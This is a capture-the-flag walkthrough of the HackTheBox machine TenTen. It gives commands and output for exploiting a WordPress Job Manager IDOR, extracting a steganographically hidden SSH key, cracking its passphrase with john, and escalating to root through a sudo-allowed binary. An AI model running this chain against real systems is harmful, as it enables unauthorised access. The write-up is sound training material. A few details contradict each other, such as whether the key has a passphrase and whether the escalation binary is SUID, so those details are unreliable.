HackTheBox: TenTen

┌──(kali㉿kali)-[~]
└─$ sudo nmap 10.10.10.10 -sC -sV -p 22,80
Nmap scan report for 10.10.10.10
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Job Portal – Just another WordPress site
Nmap scan results showing SSH on port 22 and Apache HTTP on port 80 running a WordPress Job Portal site

A detailed service version scan confirms OpenSSH 7.2p2 and Apache 2.4.18 hosting the WordPress site.

Nmap service version scan output with detailed SSH and HTTP service information for the target

Port 80 is a WordPress job portal. WPScan identifies the version as 4.7.3 with 74 known vulnerabilities, and enumerates a single user takis. A vulnerable plugin is also detected:

[+] job-manager
 | Version: 0.7.25
 | [!] Title: Job Manager <= 0.7.25 - Insecure Direct Object Reference (IDOR)
 |     CVE-2015-6668
WordPress Job Portal site in browser with Wappalyzer showing WordPress 4.7.3, PHP, MySQL, and Apache

WPScan confirms the WordPress version and flags the vulnerable Job Manager plugin.

WPScan results showing directory fuzzing hits and identified vulnerabilities in the Job Manager plugin

CVE-2015-6668 allows unauthenticated enumeration of uploaded job application filenames by iterating the post ID in the URL. Browsing to /index.php/jobs/apply/8/ (and nearby IDs) reveals a job application post by user TAKIS. Iterating IDs finds a file attachment that doesn't have an obvious extension — a brute-force script from the CVE PoC maps this to the uploaded file URL.

WordPress Job Portal showing a Hello world post by user takis with Jobs Listing navigation

WPScan confirms the IDOR vulnerability in the Job Manager plugin.

WPScan identifying CVE-2015-6668 IDOR vulnerability in Job Manager plugin version 0.7.25

The job application form includes a file upload feature that stores attachments in a predictable path.

Job Portal registration page showing the job application form with file upload functionality

Iterating through post IDs via the IDOR endpoint enumerates uploaded job application titles.

Script iterating through WordPress post IDs via the IDOR vulnerability, enumerating uploaded job application titles

The CVE PoC script brute-forces the upload directory structure to locate the actual file URL.

Python exploit script for CVE-2015-6668 that brute-forces uploaded file URLs by iterating date paths and extensions

The exploit locates HackerAccessGranted.jpg in the WordPress uploads directory.

CVE-2015-6668 exploit successfully finding HackerAccessGranted.jpg at a WordPress uploads URL

Downloading and viewing the image reveals a hacker-themed stock photo -- nothing useful at first glance.

Browser displaying HackerAccessGranted.jpg, a hacker-themed stock image with ACCESS GRANTED text overlay

The file turns out to be an image. Checking exif data reveals nothing, but strings shows something interesting embedded, and steghide confirms a hidden file is present:

┌──(kali㉿kali)-[~]
└─$ steghide info HackerAccessGranted.jpg
  format: jpeg
  capacity: 0.2 KB
Try to get info without a passphrase? (y/n): y
  embedded file "id_rsa":
    size: 1.7 KB
    encrypted: rijndael-128, cbc
    compressed: yes
Exiftool output showing JFIF metadata for HackerAccessGranted.jpg with no useful embedded data

Running strings on the image reveals suspicious binary data beyond the normal JFIF structure.

Running strings on HackerAccessGranted.jpg revealing suspicious embedded binary data among JFIF markers

Steghide confirms an RSA private key is embedded inside the image, encrypted with rijndael-128.

Steghide confirming an embedded id_rsa file hidden inside HackerAccessGranted.jpg, encrypted with rijndael-128

An RSA private key is embedded with no passphrase. Converting to John format and cracking:

┌──(kali㉿kali)-[~]
└─$ ssh2john id_rsa > id_rsa.john
└─$ john --wordlist=rockyou.txt id_rsa.john
superstar         (id_rsa)
Extracted RSA private key displayed in terminal, encrypted with a passphrase

John the Ripper cracks the key passphrase in seconds using the rockyou wordlist.

John the Ripper cracking the SSH key passphrase using rockyou.txt wordlist, revealing the password superstar

SSH in as takis:

┌──(kali㉿kali)-[~]
└─$ ssh -i id_rsa [email protected]
takis@tenten:~$ sudo -l
User takis may run the following commands on tenten:
    (ALL : ALL) NOPASSWD: /bin/fuckin
takis@tenten:~$ sudo /bin/fuckin bash
root@tenten:~# id
uid=0(root) gid=0(root) groups=0(root)
root@tenten:~# cat /root/root.txt
[REDACTED]
SSH session as takis, using sudo /bin/fuckin bash to escalate to root and reading the root flag

Privilege escalation was trivial — a custom SUID binary that executes its argument.

Rooted.